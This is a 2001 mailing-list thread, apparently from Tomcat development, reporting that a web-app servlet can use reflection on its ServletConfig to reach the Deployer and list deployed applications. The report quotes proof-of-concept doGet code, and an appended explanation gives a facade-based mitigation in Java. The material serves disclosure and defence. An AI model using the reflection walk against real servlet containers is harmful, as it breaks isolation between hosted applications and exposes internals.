On 11 May 2001, Fabien Le Floc'h wrote:

> I apologize for repeating this, but I did not yet get any answer.
> 
> I wrote a servlet in a classic WAR file at an arbitrary location and
> NOT in the org.apache.catalina package. From this servlet, I was able
> to access a method on the Deployer, i.e. I was able to access anything
> public in any Container "from outside". This is only working by using
> reflection.
> 

I'm investigating this one (and another reported security issue) right
now.  I've got an equivalent test case, so I won't need a war file.

Craig

> Here is the code (not clean, sorry about that) for the doGet method:
> 
>       response.setContentType("text/plain");
>       PrintWriter writer = response.getWriter();
> 
>       Object theWrapper = (Object) this.getServletConfig();
>       try {
>           Method method = theWrapper.getClass().getMethod("getParent", new Class[] {});
> 
>           Object theContext = method.invoke(theWrapper, new Object[] {});
>           method = theContext.getClass().getMethod("getParent", new Class[] {});
>           Object theDeployer = method.invoke(theContext, new Object[] {});
>           method = theDeployer.getClass().getMethod("findDeployedApps", new Class[] {});
>           Object deployedApps = method.invoke(theDeployer, new Object[] {});
>           String[] apps = (String[]) deployedApps;
>           writer.println("detected apps:");
>           for (int i = 0; i < apps.length; i++) {
>               writer.println(apps[i]);
>           }
>       } catch (Exception e) {
>           e.printStackTrace();
>           writer.println("An exception occurred when invoking the method, " + e.getMessage());
>       }
>       writer.flush();
>       writer.close();
> 
> 
> 
> Conclusion: there is a security issue. We don't need the prerequisite to access
> Catalina core classes. I am really wondering how it would be possible to fix this
> security problem without an important redesign.
> 
> 
> Regards,
> 
> 
> Fabien
> 
> P.S.: should I include a WAR file?
> 
> 
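The reflection walk quoted above works because the object returned by getServletConfig() is the container's own wrapper, whose runtime class carries a public getParent(). The usual mitigation is to hand the servlet a facade that implements only the servlet-config contract and forwards to the real object, so getClass().getMethod("getParent") finds nothing. The following is an added illustration of that pattern, not Tomcat code; the class names (Config, InternalWrapper, InternalContext, ConfigFacade) are hypothetical stand-ins for the container's types.

```java
import java.lang.reflect.Method;

// Added example: a facade keeps the container's internal parent chain out of
// reach of public reflection on the object a servlet is handed.
// All type names here are hypothetical, not the container's real classes.
public class FacadeDemo {

    /** What a servlet is entitled to see: the public servlet-config contract. */
    interface Config {
        String getServletName();
        String getInitParameter(String name);
    }

    /** Internal container node one level up; stands in for the context/deployer. */
    static class InternalContext {
        // Constructed sample data, not read from any real deployer.
        String[] findDeployedApps() { return new String[] {"manager", "examples"}; }
    }

    /** The container's own wrapper: implements Config but also exposes getParent(). */
    static class InternalWrapper implements Config {
        private final InternalContext parent = new InternalContext();
        public String getServletName() { return "demo"; }
        public String getInitParameter(String name) { return null; }
        // Public and on the runtime class, so getClass().getMethod("getParent") finds it.
        public InternalContext getParent() { return parent; }
    }

    /** Facade handed to the servlet: final, and forwards ONLY the Config methods. */
    static final class ConfigFacade implements Config {
        private final Config delegate;
        ConfigFacade(Config delegate) { this.delegate = delegate; }
        public String getServletName() { return delegate.getServletName(); }
        public String getInitParameter(String name) { return delegate.getInitParameter(name); }
        // Deliberately no getParent(): the internal type is not part of this class's
        // public surface, so the quoted reflection walk stops at the first step.
    }

    /** True if a public no-argument method of that name is reachable on the runtime class. */
    static boolean exposes(Object target, String methodName) {
        try {
            Method m = target.getClass().getMethod(methodName, new Class[] {});
            return m != null;
        } catch (NoSuchMethodException e) {
            return false;
        }
    }

    public static void main(String[] args) {
        InternalWrapper raw = new InternalWrapper();
        Config safe = new ConfigFacade(raw);

        System.out.println("raw wrapper exposes getParent:  " + exposes(raw, "getParent"));
        System.out.println("facade exposes getParent:       " + exposes(safe, "getParent"));
        System.out.println("facade exposes getServletName:  " + exposes(safe, "getServletName"));
    }
}
```

Running it shows the raw wrapper exposing getParent while the facade exposes only the Config methods. The facade closes the public-reflection path the posted servlet uses; it does not by itself stop code that calls setAccessible(true) on the facade's private delegate field, which is why a container that relies on this pattern also needs a SecurityManager policy that denies web applications the suppressAccessChecks ReflectPermission.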
